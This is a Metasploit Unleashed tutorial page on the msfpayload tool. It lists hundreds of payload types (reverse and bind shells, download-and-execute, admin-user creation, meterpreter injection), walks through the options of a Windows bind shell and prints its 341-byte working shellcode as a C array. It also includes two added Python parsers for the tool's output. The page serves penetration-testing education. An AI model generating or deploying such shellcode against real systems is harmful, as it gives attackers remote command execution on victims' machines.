Msfpayload

From Metasploit Unleashed - Mastering The Framework


msfpayload is a command-line instance of Metasploit that is used to generate and output all of the various types of shellcode that are available in Metasploit. The most common use of this tool is for the generation of shellcode for an exploit that is not currently in the Metasploit Framework or for testing different types of shellcode and options before finalizing a module.

This tool has many different options and variables available to it, but the brief help banner does not make all of them obvious.

root@bt:~# msfpayload -h

    Usage: /pentest/exploits/framework3/msfpayload [<options>] <payload> [var=val] <[S]ummary|C|[P]erl|Rub[y]|[R]aw|[J]s|e[X]e|[D]ll|[V]BA|[W]ar>

OPTIONS:

    -h        Help banner
    -l        List available payloads

The power of this tool becomes clear when you list the large number of different shellcode types that are available to be customized for your specific exploit:

root@bt:~# msfpayload -l

Framework Payloads (222 total)
==============================

    Name                                             Description
    ----                                             -----------
    aix/ppc/shell_bind_tcp                           Listen for a connection and spawn a command shell
    aix/ppc/shell_find_port                          Spawn a shell on an established connection
    aix/ppc/shell_interact                           Simply execve /bin/sh (for inetd programs)
    aix/ppc/shell_reverse_tcp                        Connect back to attacker and spawn a command shell
    bsd/sparc/shell_bind_tcp                         Listen for a connection and spawn a command shell
    bsd/sparc/shell_reverse_tcp                      Connect back to attacker and spawn a command shell
    bsd/x86/exec                                     Execute an arbitrary command
    bsd/x86/metsvc_bind_tcp                          Stub payload for interacting with a Meterpreter Service
    bsd/x86/metsvc_reverse_tcp                       Stub payload for interacting with a Meterpreter Service
    bsd/x86/shell/bind_tcp                           Listen for a connection, Spawn a command shell (staged)
    bsd/x86/shell/find_tag                           Use an established connection, Spawn a command shell (staged)
    bsd/x86/shell/reverse_tcp                        Connect back to the attacker, Spawn a command shell (staged)
    bsd/x86/shell_bind_tcp                           Listen for a connection and spawn a command shell
    bsd/x86/shell_find_port                          Spawn a shell on an established connection
    bsd/x86/shell_find_tag                           Spawn a shell on an established connection (proxy/nat safe)
    bsd/x86/shell_reverse_tcp                        Connect back to attacker and spawn a command shell
    bsdi/x86/shell/bind_tcp                          Listen for a connection, Spawn a command shell (staged)
    bsdi/x86/shell/reverse_tcp                       Connect back to the attacker, Spawn a command shell (staged)
    bsdi/x86/shell_bind_tcp                          Listen for a connection and spawn a command shell
    bsdi/x86/shell_find_port                         Spawn a shell on an established connection
    bsdi/x86/shell_reverse_tcp                       Connect back to attacker and spawn a command shell
    cmd/unix/bind_inetd                              Listen for a connection and spawn a command shell (persistent)
    cmd/unix/bind_netcat                             Listen for a connection and spawn a command shell via netcat
    cmd/unix/bind_perl                               Listen for a connection and spawn a command shell via perl
    cmd/unix/bind_ruby                               Continually listen for a connection and spawn a command shell via Ruby
    cmd/unix/generic                                 Executes the supplied command
    cmd/unix/interact                                Interacts with a shell on an established socket connection
    cmd/unix/reverse                                 Creates an interactive shell through two inbound connections
    cmd/unix/reverse_bash                            
				Creates an interactive shell via bash's builtin /dev/tcp.
				This will not work on most Debian-based Linux distributions
				(including Ubuntu) because they compile bash without the
				/dev/tcp feature.
				
    cmd/unix/reverse_netcat                          Creates an interactive shell via netcat
    cmd/unix/reverse_perl                            Creates an interactive shell via perl
    cmd/unix/reverse_ruby                            Connect back and create a command shell via Ruby
    cmd/windows/adduser                              Create a new user and add them to local administration group
    cmd/windows/bind_perl                            Listen for a connection and spawn a command shell via perl (persistent)
    cmd/windows/bind_ruby                            Continually listen for a connection and spawn a command shell via Ruby
    cmd/windows/download_exec_vbs                    Download an EXE from an HTTP(S) URL and execute it
    cmd/windows/reverse_perl                         Creates an interactive shell via perl
    cmd/windows/reverse_ruby                         Connect back and create a command shell via Ruby
    generic/debug_trap                               Generate a debug trap in the target process
    generic/shell_bind_tcp                           Listen for a connection and spawn a command shell
    generic/shell_reverse_tcp                        Connect back to attacker and spawn a command shell
    generic/tight_loop                               Generate a tight loop in the target process
    java/jsp_shell_bind_tcp                          Listen for a connection and spawn a command shell
    java/jsp_shell_reverse_tcp                       Connect back to attacker and spawn a command shell
    java/meterpreter/bind_tcp                        Listen for a connection, Run a meterpreter server in Java
    java/meterpreter/reverse_tcp                     Connect back stager, Run a meterpreter server in Java
    java/shell/bind_tcp                              Listen for a connection, Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else)
    java/shell/reverse_tcp                           Connect back stager, Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else)
    linux/armle/adduser                              Create a new user with UID 0
    linux/armle/exec                                 Execute an arbitrary command
    linux/armle/shell_reverse_tcp                    Connect back to attacker and spawn a command shell
    linux/mipsbe/shell_reverse_tcp                   Connect back to attacker and spawn a command shell
    linux/mipsle/shell_reverse_tcp                   Connect back to attacker and spawn a command shell
    linux/ppc/shell_bind_tcp                         Listen for a connection and spawn a command shell
    linux/ppc/shell_find_port                        Spawn a shell on an established connection
    linux/ppc/shell_reverse_tcp                      Connect back to attacker and spawn a command shell
    linux/ppc64/shell_bind_tcp                       Listen for a connection and spawn a command shell
    linux/ppc64/shell_find_port                      Spawn a shell on an established connection
    linux/ppc64/shell_reverse_tcp                    Connect back to attacker and spawn a command shell
    linux/x64/exec                                   Execute an arbitrary command
    linux/x64/shell/bind_tcp                         Listen for a connection, Spawn a command shell (staged)
    linux/x64/shell/reverse_tcp                      Connect back to the attacker, Spawn a command shell (staged)
    linux/x64/shell_bind_tcp                         Listen for a connection and spawn a command shell
    linux/x64/shell_reverse_tcp                      Connect back to attacker and spawn a command shell
    linux/x86/adduser                                Create a new user with UID 0
    linux/x86/chmod                                  Runs chmod on specified file with specified mode
    linux/x86/exec                                   Execute an arbitrary command
    linux/x86/meterpreter/bind_ipv6_tcp              Listen for a connection over IPv6, Staged meterpreter server
    linux/x86/meterpreter/bind_tcp                   Listen for a connection, Staged meterpreter server
    linux/x86/meterpreter/find_tag                   Use an established connection, Staged meterpreter server
    linux/x86/meterpreter/reverse_ipv6_tcp           Connect back to attacker over IPv6, Staged meterpreter server
    linux/x86/meterpreter/reverse_tcp                Connect back to the attacker, Staged meterpreter server
    linux/x86/metsvc_bind_tcp                        Stub payload for interacting with a Meterpreter Service
    linux/x86/metsvc_reverse_tcp                     Stub payload for interacting with a Meterpreter Service
    linux/x86/shell/bind_ipv6_tcp                    Listen for a connection over IPv6, Spawn a command shell (staged)
    linux/x86/shell/bind_tcp                         Listen for a connection, Spawn a command shell (staged)
    linux/x86/shell/find_tag                         Use an established connection, Spawn a command shell (staged)
    linux/x86/shell/reverse_ipv6_tcp                 Connect back to attacker over IPv6, Spawn a command shell (staged)
    linux/x86/shell/reverse_tcp                      Connect back to the attacker, Spawn a command shell (staged)
    linux/x86/shell_bind_ipv6_tcp                    Listen for a connection over IPv6 and spawn a command shell
    linux/x86/shell_bind_tcp                         Listen for a connection and spawn a command shell
    linux/x86/shell_find_port                        Spawn a shell on an established connection
    linux/x86/shell_find_tag                         Spawn a shell on an established connection (proxy/nat safe)
    linux/x86/shell_reverse_tcp                      Connect back to attacker and spawn a command shell
    linux/x86/shell_reverse_tcp2                     Connect back to attacker and spawn a command shell
    netware/shell/reverse_tcp                        Connect back to the attacker, Connect to the NetWare console (staged)
    osx/armle/execute/bind_tcp                       Listen for a connection, Spawn a command shell (staged)
    osx/armle/execute/reverse_tcp                    Connect back to the attacker, Spawn a command shell (staged)
    osx/armle/shell/bind_tcp                         Listen for a connection, Spawn a command shell (staged)
    osx/armle/shell/reverse_tcp                      Connect back to the attacker, Spawn a command shell (staged)
    osx/armle/shell_bind_tcp                         Listen for a connection and spawn a command shell
    osx/armle/shell_reverse_tcp                      Connect back to attacker and spawn a command shell
    osx/armle/vibrate                                
				Causes the iPhone to vibrate, only works when the AudioToolkit library has been loaded.
				Based on work by Charlie Miller .
			
    osx/ppc/shell/bind_tcp                           Listen for a connection, Spawn a command shell (staged)
    osx/ppc/shell/find_tag                           Use an established connection, Spawn a command shell (staged)
    osx/ppc/shell/reverse_tcp                        Connect back to the attacker, Spawn a command shell (staged)
    osx/ppc/shell_bind_tcp                           Listen for a connection and spawn a command shell
    osx/ppc/shell_reverse_tcp                        Connect back to attacker and spawn a command shell
    osx/x86/bundleinject/bind_tcp                    Listen, read length, read buffer, execute, Inject a custom Mach-O bundle into the exploited process
    osx/x86/bundleinject/reverse_tcp                 Connect, read length, read buffer, execute, Inject a custom Mach-O bundle into the exploited process
    osx/x86/exec                                     Execute an arbitrary command
    osx/x86/isight/bind_tcp                          Listen, read length, read buffer, execute, Inject a Mach-O bundle to capture a photo from the iSight (staged)
    osx/x86/isight/reverse_tcp                       Connect, read length, read buffer, execute, Inject a Mach-O bundle to capture a photo from the iSight (staged)
    osx/x86/shell_bind_tcp                           Listen for a connection and spawn a command shell
    osx/x86/shell_find_port                          Spawn a shell on an established connection
    osx/x86/shell_reverse_tcp                        Connect back to attacker and spawn a command shell
    osx/x86/vforkshell/bind_tcp                      Listen, read length, read buffer, execute, Call vfork() if necessary and spawn a command shell (staged)
    osx/x86/vforkshell/reverse_tcp                   Connect, read length, read buffer, execute, Call vfork() if necessary and spawn a command shell (staged)
    osx/x86/vforkshell_bind_tcp                      Listen for a connection, vfork if necessary, and spawn a command shell
    osx/x86/vforkshell_reverse_tcp                   Connect back to attacker, vfork if necessary, and spawn a command shell
    php/bind_perl                                    Listen for a connection and spawn a command shell via perl (persistent)
    php/bind_php                                     Listen for a connection and spawn a command shell via php
    php/download_exec                                Download an EXE from an HTTP URL and execute it
    php/exec                                         Execute a single system command
    php/meterpreter/bind_tcp                         Listen for a connection, Run a meterpreter server in PHP
    php/meterpreter/reverse_tcp                      Reverse PHP connect back stager with checks for disabled functions, Run a meterpreter server in PHP
    php/meterpreter_reverse_tcp                      Connect back to attacker and spawn a Meterpreter server (PHP)
    php/reverse_perl                                 Creates an interactive shell via perl
    php/reverse_php                                  Reverse PHP connect back shell with checks for disabled functions
    php/shell_findsock                               
				Spawn a shell on the established connection to
				the webserver.  Unfortunately, this payload
				can leave conspicuous evil-looking entries in the
				apache error logs, so it is probably a good idea
				to use a bind or reverse shell unless firewalls
				prevent them from working.  The issue this
				payload takes advantage of (CLOEXEC flag not set
				on sockets) appears to have been patched on the
				Ubuntu version of Apache and may not work on
				other Debian-based distributions.  Only tested on
				Apache but it might work on other web servers
				that leak file descriptors to child processes.
				
    solaris/sparc/shell_bind_tcp                     Listen for a connection and spawn a command shell
    solaris/sparc/shell_find_port                    Spawn a shell on an established connection
    solaris/sparc/shell_reverse_tcp                  Connect back to attacker and spawn a command shell
    solaris/x86/shell_bind_tcp                       Listen for a connection and spawn a command shell
    solaris/x86/shell_find_port                      Spawn a shell on an established connection
    solaris/x86/shell_reverse_tcp                    Connect back to attacker and spawn a command shell
    tty/unix/interact                                Interacts with a TTY on an established socket connection
    windows/adduser                                  Create a new user and add them to local administration group
    windows/dllinject/bind_ipv6_tcp                  Listen for a connection over IPv6, Inject a Dll via a reflective loader
    windows/dllinject/bind_nonx_tcp                  Listen for a connection (No NX), Inject a Dll via a reflective loader
    windows/dllinject/bind_tcp                       Listen for a connection, Inject a Dll via a reflective loader
    windows/dllinject/find_tag                       Use an established connection, Inject a Dll via a reflective loader
    windows/dllinject/reverse_http                   Tunnel communication over HTTP using IE 6, Inject a Dll via a reflective loader
    windows/dllinject/reverse_ipv6_tcp               Connect back to the attacker over IPv6, Inject a Dll via a reflective loader
    windows/dllinject/reverse_nonx_tcp               Connect back to the attacker (No NX), Inject a Dll via a reflective loader
    windows/dllinject/reverse_ord_tcp                Connect back to the attacker, Inject a Dll via a reflective loader
    windows/dllinject/reverse_tcp                    Connect back to the attacker, Inject a Dll via a reflective loader
    windows/dllinject/reverse_tcp_allports           Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a Dll via a reflective loader
    windows/dllinject/reverse_tcp_dns                Connect back to the attacker, Inject a Dll via a reflective loader
    windows/download_exec                            Download an EXE from an HTTP URL and execute it
    windows/exec                                     Execute an arbitrary command
    windows/messagebox                               Spawns a dialog via MessageBox using a customizable title, text & icon
    windows/meterpreter/bind_ipv6_tcp                Listen for a connection over IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/bind_nonx_tcp                Listen for a connection (No NX), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/bind_tcp                     Listen for a connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/find_tag                     Use an established connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/reverse_http                 Tunnel communication over HTTP using IE 6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/reverse_https                Tunnel communication over HTTP using SSL, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/reverse_ipv6_tcp             Connect back to the attacker over IPv6, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/reverse_nonx_tcp             Connect back to the attacker (No NX), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/reverse_ord_tcp              Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/reverse_tcp                  Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/reverse_tcp_allports         Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/meterpreter/reverse_tcp_dns              Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)
    windows/metsvc_bind_tcp                          Stub payload for interacting with a Meterpreter Service
    windows/metsvc_reverse_tcp                       Stub payload for interacting with a Meterpreter Service
    windows/patchupdllinject/bind_ipv6_tcp           Listen for a connection over IPv6, Inject a custom DLL into the exploited process
    windows/patchupdllinject/bind_nonx_tcp           Listen for a connection (No NX), Inject a custom DLL into the exploited process
    windows/patchupdllinject/bind_tcp                Listen for a connection, Inject a custom DLL into the exploited process
    windows/patchupdllinject/find_tag                Use an established connection, Inject a custom DLL into the exploited process
    windows/patchupdllinject/reverse_ipv6_tcp        Connect back to the attacker over IPv6, Inject a custom DLL into the exploited process
    windows/patchupdllinject/reverse_nonx_tcp        Connect back to the attacker (No NX), Inject a custom DLL into the exploited process
    windows/patchupdllinject/reverse_ord_tcp         Connect back to the attacker, Inject a custom DLL into the exploited process
    windows/patchupdllinject/reverse_tcp             Connect back to the attacker, Inject a custom DLL into the exploited process
    windows/patchupdllinject/reverse_tcp_allports    Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a custom DLL into the exploited process
    windows/patchupdllinject/reverse_tcp_dns         Connect back to the attacker, Inject a custom DLL into the exploited process
    windows/patchupmeterpreter/bind_ipv6_tcp         Listen for a connection over IPv6, Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/bind_nonx_tcp         Listen for a connection (No NX), Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/bind_tcp              Listen for a connection, Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/find_tag              Use an established connection, Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/reverse_ipv6_tcp      Connect back to the attacker over IPv6, Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/reverse_nonx_tcp      Connect back to the attacker (No NX), Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/reverse_ord_tcp       Connect back to the attacker, Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/reverse_tcp           Connect back to the attacker, Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/reverse_tcp_allports  Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject the meterpreter server DLL (staged)
    windows/patchupmeterpreter/reverse_tcp_dns       Connect back to the attacker, Inject the meterpreter server DLL (staged)
    windows/shell/bind_ipv6_tcp                      Listen for a connection over IPv6, Spawn a piped command shell (staged)
    windows/shell/bind_nonx_tcp                      Listen for a connection (No NX), Spawn a piped command shell (staged)
    windows/shell/bind_tcp                           Listen for a connection, Spawn a piped command shell (staged)
    windows/shell/find_tag                           Use an established connection, Spawn a piped command shell (staged)
    windows/shell/reverse_http                       Tunnel communication over HTTP using IE 6, Spawn a piped command shell (staged)
    windows/shell/reverse_ipv6_tcp                   Connect back to the attacker over IPv6, Spawn a piped command shell (staged)
    windows/shell/reverse_nonx_tcp                   Connect back to the attacker (No NX), Spawn a piped command shell (staged)
    windows/shell/reverse_ord_tcp                    Connect back to the attacker, Spawn a piped command shell (staged)
    windows/shell/reverse_tcp                        Connect back to the attacker, Spawn a piped command shell (staged)
    windows/shell/reverse_tcp_allports               Try to connect back to the attacker, on all possible ports (1-65535, slowly), Spawn a piped command shell (staged)
    windows/shell/reverse_tcp_dns                    Connect back to the attacker, Spawn a piped command shell (staged)
    windows/shell_bind_tcp                           Listen for a connection and spawn a command shell
    windows/shell_bind_tcp_xpfw                      Disable the Windows ICF, then listen for a connection and spawn a command shell
    windows/shell_reverse_tcp                        Connect back to attacker and spawn a command shell
    windows/speak_pwned                              Causes the target to say "You Got Pwned" via the Windows Speech API
    windows/upexec/bind_ipv6_tcp                     Listen for a connection over IPv6, Uploads an executable and runs it (staged)
    windows/upexec/bind_nonx_tcp                     Listen for a connection (No NX), Uploads an executable and runs it (staged)
    windows/upexec/bind_tcp                          Listen for a connection, Uploads an executable and runs it (staged)
    windows/upexec/find_tag                          Use an established connection, Uploads an executable and runs it (staged)
    windows/upexec/reverse_http                      Tunnel communication over HTTP using IE 6, Uploads an executable and runs it (staged)
    windows/upexec/reverse_ipv6_tcp                  Connect back to the attacker over IPv6, Uploads an executable and runs it (staged)
    windows/upexec/reverse_nonx_tcp                  Connect back to the attacker (No NX), Uploads an executable and runs it (staged)
    windows/upexec/reverse_ord_tcp                   Connect back to the attacker, Uploads an executable and runs it (staged)
    windows/upexec/reverse_tcp                       Connect back to the attacker, Uploads an executable and runs it (staged)
    windows/upexec/reverse_tcp_allports              Try to connect back to the attacker, on all possible ports (1-65535, slowly), Uploads an executable and runs it (staged)
    windows/upexec/reverse_tcp_dns                   Connect back to the attacker, Uploads an executable and runs it (staged)
    windows/vncinject/bind_ipv6_tcp                  Listen for a connection over IPv6, Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/bind_nonx_tcp                  Listen for a connection (No NX), Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/bind_tcp                       Listen for a connection, Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/find_tag                       Use an established connection, Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/reverse_http                   Tunnel communication over HTTP using IE 6, Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/reverse_ipv6_tcp               Connect back to the attacker over IPv6, Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/reverse_nonx_tcp               Connect back to the attacker (No NX), Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/reverse_ord_tcp                Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/reverse_tcp                    Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/reverse_tcp_allports           Try to connect back to the attacker, on all possible ports (1-65535, slowly), Inject a VNC Dll via a reflective loader (staged)
    windows/vncinject/reverse_tcp_dns                Connect back to the attacker, Inject a VNC Dll via a reflective loader (staged)
    windows/x64/exec                                 Execute an arbitrary command (Windows x64)
    windows/x64/meterpreter/bind_tcp                 Listen for a connection (Windows x64), Inject the meterpreter server DLL via the Reflective Dll Injection payload (Windows x64) (staged)
    windows/x64/meterpreter/reverse_tcp              Connect back to the attacker (Windows x64), Inject the meterpreter server DLL via the Reflective Dll Injection payload (Windows x64) (staged)
    windows/x64/shell/bind_tcp                       Listen for a connection (Windows x64), Spawn a piped command shell (Windows x64) (staged)
    windows/x64/shell/reverse_tcp                    Connect back to the attacker (Windows x64), Spawn a piped command shell (Windows x64) (staged)
    windows/x64/shell_bind_tcp                       Listen for a connection and spawn a command shell (Windows x64)
    windows/x64/shell_reverse_tcp                    Connect back to attacker and spawn a command shell (Windows x64)
    windows/x64/vncinject/bind_tcp                   Listen for a connection (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)
    windows/x64/vncinject/reverse_tcp                Connect back to the attacker (Windows x64), Inject a VNC Dll via a reflective loader (Windows x64) (staged)


Once you have selected a payload, there are two switches that are used most often when crafting the payload for the exploit you are creating. In the example below we have selected a simple Windows bind shell. When we add the command-line argument "O" with that payload, we get all of the available configurable options for that payload.

root@bt:~# msfpayload windows/shell_bind_tcp O

       Name: Windows Command Shell, Bind TCP Inline
     Module: payload/windows/shell_bind_tcp
    Version: 8642
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 341
       Rank: Normal

Provided by:
  vlad902 
  sf 

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LPORT     4444             yes       The listen port
RHOST                      no        The target address

Description:
  Listen for a connection and spawn a command shell

As we can see from the output, this payload has three configurable options, and the listing shows for each whether it is required, what its default setting is (if any), and a short description:

  • EXITFUNC
    • Required
    • Default setting: process
  • LPORT
    • Required
    • Default setting: 4444
  • RHOST
    • Not required
    • No default setting


Setting these options in msfpayload is very simple. An example is shown below of changing the exit technique and listening port of the shell:

root@bt:~# msfpayload windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 O

       Name: Windows Command Shell, Bind TCP Inline
     Module: payload/windows/shell_bind_tcp
    Version: 8642
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 341
       Rank: Normal

Provided by:
  vlad902 
  sf 

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  seh              yes       Exit technique: seh, thread, process, none
LPORT     1234             yes       The listen port
RHOST                      no        The target address

Description:
  Listen for a connection and spawn a command shell
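
The option summary above is a fixed-width table, and a practitioner who scripts around msfpayload usually wants it as data rather than as text: which options exist, which are required, and which required options are still unset before the payload is generated. The parser below is an added example, not code from Metasploit or from the original page. It assumes the table layout shown above (the row of dashes under the column headers marks where each column starts) and embeds a constructed copy of that output as its sample input.

```python
"""Parse the option summary that ``msfpayload <payload> O`` prints.

Added example; it is not part of Metasploit or of the original page. It assumes
the fixed-width "Basic options" table layout shown on the page, where the row
of dashes under the column headers marks where each column starts.
"""
import re
from dataclasses import dataclass

# Constructed sample laid out like `msfpayload windows/shell_bind_tcp O`.
SAMPLE_SUMMARY = """\
       Name: Windows Command Shell, Bind TCP Inline
     Module: payload/windows/shell_bind_tcp
    Version: 8642
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 341
       Rank: Normal

Provided by:
  vlad902
  sf

Basic options:
Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique: seh, thread, process, none
LPORT     4444             yes       The listen port
RHOST                      no        The target address

Description:
  Listen for a connection and spawn a command shell
"""


@dataclass
class Option:
    name: str
    current: str
    required: bool
    description: str


def parse_header(text):
    """Return the 'Key: value' lines above the first blank line as a dict."""
    header = {}
    for line in text.splitlines():
        if not line.strip():
            break  # the blank line ends the header block
        key, _, value = line.partition(":")
        header[key.strip()] = value.strip()
    return header


def parse_options(text):
    """Return the rows of the 'Basic options' table as Option objects."""
    lines = text.splitlines()
    if "Basic options:" not in lines:
        return []
    start = lines.index("Basic options:")
    dash_row = lines[start + 2]
    # Each run of dashes marks a column start; the last column runs to end of line.
    starts = [m.start() for m in re.finditer(r"-+", dash_row)]
    if len(starts) != 4:
        raise ValueError("unexpected option table layout")
    bounds = list(zip(starts, starts[1:] + [None]))
    options = []
    for row in lines[start + 3:]:
        if not row.strip():
            break  # a blank line ends the table
        name, current, required, description = (row[a:b].strip() for a, b in bounds)
        options.append(Option(name, current, required.lower() == "yes", description))
    return options


def unset_required(options):
    """Names of required options that have no current setting."""
    return [o.name for o in options if o.required and not o.current]


def summarize(text):
    """Combine the header and the option table into one dict for easy checks."""
    header = parse_header(text)
    options = parse_options(text)
    return {
        "module": header.get("Module"),
        "size": int(header.get("Total size", "0")),
        "options": {o.name: o for o in options},
        "unset_required": unset_required(options),
    }


if __name__ == "__main__":
    for name, opt in summarize(SAMPLE_SUMMARY)["options"].items():
        print(f"{name:10} required={opt.required!s:5} current={opt.current!r}")
```

Slicing by the dash row rather than splitting on whitespace is what makes the empty RHOST cell come out as an empty string instead of shifting the remaining columns; the same parser works unchanged on the second listing above, where EXITFUNC and LPORT were overridden on the command line.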

Now that all of that is configured, the only option left is to specify the output type such as C, Perl, Raw, etc. For this example we are going to output our shellcode as C:

root@bt:~# msfpayload windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 C
/*
 * windows/shell_bind_tcp - 341 bytes
 * http://www.metasploit.com
 * LPORT=1234, RHOST=, EXITFUNC=seh, InitialAutoRunScript=,
 * AutoRunScript=
 */
unsigned char buf[] =
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01"
"\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7"
"\x31\xdb\x53\x68\x02\x00\x04\xd2\x89\xe6\x6a\x10\x56\x57\x68"
"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5"
"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75"
"\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57"
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01"
"\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e"
"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56"
"\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xfe\x0e\x32\xea"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";

Now we have our fully customized shellcode to be used in any exploit!
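The C output above carries its own metadata: the header comment states the payload name, the byte count and the options it was generated with, and the array literal holds the bytes as hex escapes. When such output is kept as an engagement artifact, or handed to an analyst who needs to hash it or feed it to a scanner, the first step is to turn it back into raw bytes and confirm that the count in the header matches what the literal actually contains. The parser below is an added example, not code from Metasploit or from the original page; it assumes the output layout shown above and uses a constructed sample whose bytes are the ASCII letters A to T rather than real shellcode.

```python
"""Turn the C-format output of msfpayload back into raw bytes and sanity-check it.

Added example, not code from Metasploit or from the original page. It assumes
the C output layout shown on the page: a comment header of the form
"name - N bytes" followed by the generation options, then an
"unsigned char buf[] = ..." literal made only of hex (\\xNN) escapes.
"""
import hashlib
import re
from dataclasses import dataclass, field

# Constructed sample in the same layout as the real output; the bytes are the
# ASCII letters A..T (0x41..0x54), not shellcode.
SAMPLE_C_OUTPUT = r'''/*
 * example/constructed_payload - 20 bytes
 * http://www.metasploit.com
 * LPORT=1234, RHOST=, EXITFUNC=seh, InitialAutoRunScript=,
 * AutoRunScript=
 */
unsigned char buf[] =
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f"
"\x50\x51\x52\x53\x54";
'''


@dataclass
class CPayload:
    name: str
    declared_size: int
    options: dict = field(default_factory=dict)
    data: bytes = b""


def parse_c_payload(text):
    """Split the output into the comment header and the array literal, parse both."""
    comment, _, body = text.partition("*/")
    header = re.search(r"\*\s*(\S+)\s+-\s+(\d+)\s+bytes", comment)
    if not header:
        raise ValueError("no 'name - N bytes' header found")
    # Every KEY=VALUE pair in the comment, including empty values such as RHOST=.
    options = {k: v.strip() for k, v in re.findall(r"(\w+)=([^,\n]*)", comment)}
    literal = re.search(r"unsigned\s+char\s+\w+\[\]\s*=\s*(.*?);", body, re.S)
    if not literal:
        raise ValueError("no unsigned char array literal found")
    # The literal is built only from \xNN escapes, so each one is one byte.
    data = bytes(int(h, 16) for h in re.findall(r"\\x([0-9a-fA-F]{2})", literal.group(1)))
    return CPayload(header.group(1), int(header.group(2)), options, data)


def size_matches(payload):
    """True when the byte count in the header equals the bytes actually present."""
    return len(payload.data) == payload.declared_size


def sha256_hex(data):
    """Stable identifier for cataloguing the generated bytes."""
    return hashlib.sha256(data).hexdigest()


if __name__ == "__main__":
    p = parse_c_payload(SAMPLE_C_OUTPUT)
    print(p.name, p.declared_size, "declared,", len(p.data), "present")
    print("options:", p.options)
    print("sha256:", sha256_hex(p.data))
```

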